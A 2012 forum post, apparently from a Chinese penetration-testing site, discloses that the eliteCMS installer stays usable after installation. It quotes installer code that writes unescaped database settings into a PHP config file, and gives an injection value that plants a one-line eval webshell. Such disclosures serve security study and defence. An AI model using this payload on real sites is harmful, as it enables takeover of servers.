中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title:
eliteCMS installer not locked after installation + one-line webshell write vulnerability
Author:
admin
Time:
2012-11-18 13:59
The eliteCMS installer is not locked after installation finishes, so an attacker can re-run the installation simply by requesting the installer URL again.

A second vulnerability is that the installer can be made to write a one-line webshell directly into admin/includes/config.php.

Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The four session values below come straight from $_POST (see the next
    // snippet) and are interpolated into PHP source with no escaping at all.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The generated source is written to the web-reachable config file.
    $writer = fopen($file, 'w');
    ...
Now look at where those session values come from:

    $_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
    $_SESSION['DB_NAME'] = $_POST['DB_NAME'];
    $_SESSION['DB_USER'] = $_POST['DB_USER'];
    $_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.

If the database name POST field is set to:

    "?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2